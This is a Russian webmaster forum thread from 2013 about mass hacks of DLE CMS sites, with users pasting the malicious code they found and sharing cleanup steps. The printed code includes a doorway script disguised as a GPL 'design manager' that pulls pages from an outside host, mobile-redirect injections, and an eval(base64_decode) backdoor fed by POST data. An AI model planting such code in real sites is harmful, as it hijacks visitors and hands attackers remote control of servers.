Вирус на сайте cms dle

Да, веб.

Права все стоят как нужно.

Сегодня опять код этот появился((

Недавно заметил, что залили дор (замаскированный под дизайнерский скрипт) на многие сайты CMS DLE 8.5-9.5 (все заплатки установлены) в папку /language/index.php

<?php 

###############################################################################

#    Александр Корпатов

#    452 Productions Internet Group (http://blog-alexa.ru)

#    Site design Manager v1.5 BETA (с) 2012

#    Искренне надеемся , что наш скрипт поможет вам разннобразить дизаин вашего портала!

#    This script is freeware and is released under the GPL

#    Copyright (C) 2012 Alex Development Group

#

#    This program is free software; you can redistribute it and/or modify

#    it under the terms of the GNU General Public License as published by

#    the Free Software Foundation; either version 2 of the License, or

#    (at your option) any later version.

#

#    This program is distributed in the hope that it will be useful,

#    but WITHOUT ANY WARRANTY; without even the implied warranty of

#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the

#    GNU General Public License for more details.

#

#    You should have received a copy of the GNU General Public License

#    along with this program; if not, write to the Free Software

#    Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.

#    Or just download it http://www.fsf.org/

###############################################################################



// Настройка форматов файлов для дизайна вашего портала

error_reporting(0); 

$name =  $_SERVER['REQUEST_URI']; 

$charset = "windows-1251";                                      

$defaultType = "text/html; charset=$charset"; 

$fileType = array( 

    "css" => "text/css; charset=$charset", 

    "png" => "image/png", 

    "jpg" => "image/jpeg", 

    "jpeg" => "image/jpeg", 

    "gif" => "image/gif", 

    "js" => "text/javascript", 

    "xml" => "text/xml", 

    ); 

// Настройки сервера для проверки лицензии.Не менять!

$dh = 'http://blog-alexa.ru/arch1v3/license/'.str_replace('www.','',$_SERVER[SERVER_NAME]); 

$f1 = strrpos($name, "."); 

$f2 = substr($name, $f1 + 1, 999); 

$fileRas = strtolower($f2); 

$filename = $dh.$name; 

$file = file($filename); 

$type = array_key_exists($fileRas, $fileType) ? $fileType[$fileRas] : $defaultType; 

header("Content-Type: $type"); 

if($file) 

{ 

    $html = implode('', $file); 

    echo $html; 

    exit; 

}elseif(extension_loaded('curl')) 

{ 

    $ch = curl_init(); 

    $url_string = $dh.'/'.$name; 

    curl_setopt ($ch, CURLOPT_URL, $url_string); 

    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); 

    $html = curl_exec ($ch); 

    curl_close($ch); 

     

    if($html) 

    { 

        echo $html; 

    } 

    else 

    { 

        header("Status: 404 Not Found"); 

        echo 'PAGE NOT FOUND'; 

    } 

    exit; 

} 

else 

{ 

   header("Status: 404 Not Found"); 

   echo 'PAGE NOT FOUND'; 

} 

?>

Хмм, скрипт оказался и на одном html сайте. Будьте бдительны.

А что мешает купить лицензионную DLE? И будет всё нормально. У вас же сплошные дыры в CMS. У меня все сайты на лицензии и всё нормально.

Без обид.

Мимо! Лицензию тоже ломают. Просто вам повезло ;)

Блин и меня опять ломанули, но теперь поступили хитро. Код раньше вставляли в main.tpl теперь в index.php, который в корне. Грузилось псевдо обновление браузера.

index.php:

language/Russian/website.lng, engine/engine.php, engine/init.php, engine/data/config.php, engine/data/dbconfig.php:

P.S спасибо Ai-bolit

И это еще не конец :( Остальное пока не могу найти.

Давайте что решать уважаемые АДМИНЫ!!! Сколько это может продолжаться???Нужно принимать кардинальные меры по ликвидации этого паразита!

Купил по новогодней акции две лицензии (получил 4). За несколько дней до массовых взломов успел установить на 3 сайта с трафиком. Итог: два из ни в январе взломаны, полтора десятка дохлых сателлитов на нуленых движках - нетронуты. Вот так. :)

Сателлиты на DLE 9.3-9.6. На одном нашёл пользователя "tehApocalypse", но редирект прописан не был.

Сайты ломают там где открыта регистрация.

И снова взлом на сайте где открыта регистрация юзеров.

Результаты базы

Зарегистрировано пользователей: 76086

Всего комментариев: 7894 [ последние комментарии ] [ редактировать комментарии ]

$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");

$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");

$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");

$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");

$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");



if ($iphone || $android || $palmpre || $ipod || $berry === true) { 

    header('Location: http://statuses.ws/');

}if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: http://yacounter.ws/');

if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));







$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");

$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");

$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");

$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");

$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");



if ($iphone || $android || $palmpre || $ipod || $berry === true) { 

    header('Location: http://statuses.ws/');

}if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: http://yacounter.ws/');

if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));

Щас проверю другие сайты у себя.

---------- Добавлено 03.02.2013 в 19:29 ----------

Смотрите движки таким образом.

Сканирование системы антивирусом Дле.

И просматривайте все что менялось 2 февраля.

По изменению вижу что второго покоцали

./engine/engine.php 34,09 Kb 03.02.2013 19:09:34 не соответствует

./engine/data/dbconfig.php 1 Kb 02.02.2013 01:26:59 не соответствует

./engine/init.php 14,21 Kb 03.02.2013 19:07:41 не соответствует

./language/Russian/website.lng 36,09 Kb 02.02.2013 01:26:59 не соответствует

И еще если у вас сателлитыю Удаляйте из базы всех не нужных юзеров.

В настрйках системы ставиет то число юзеров которое у вас там должно быть.

Я ставлю 1 и все норм

---------- Добавлено 03.02.2013 в 20:05 ----------

Я запускаю этот скрипт через команду SSH

find -type f -regex ".*\(.php\|.tpl\|.lng\|.html\)$"|while read i;do cat "$i"|grep -H --label="$i" "\"http://yacounter\|berry \=\=\= true\|statuses\.\|BlackBerry";done > readme.txt

Пробуйте, не исключено что найдете много заразы.

seosniks, Ну я у себя выудил эту заразу. Качнул просто папку www себе на пк. Тотал коммандером нашел все файлы в которых есть слово Iphone ну а там уже удалил код и залил через фтп.

Регистрация у меня открыта, закрыть не могу, людей около 8000 человек, из них 4 админа.

И айболит помог здорово. пытался ним сделать, но он нашел не везде эту заразу.

---------- Добавлено 03.02.2013 в 20:38 ----------

У меня на хостинге отключен, хотел тоже так сделать. Но сделал по другому :) Так что способ не универсален.

Еще можно искать notepad+++ тоже хороший блокнотик.

В принципе можно как и вы, только не качать папку uploads

ато долго качать придется.

Если подгружают заразу через ПМ надо опробовать отключить эту опцию.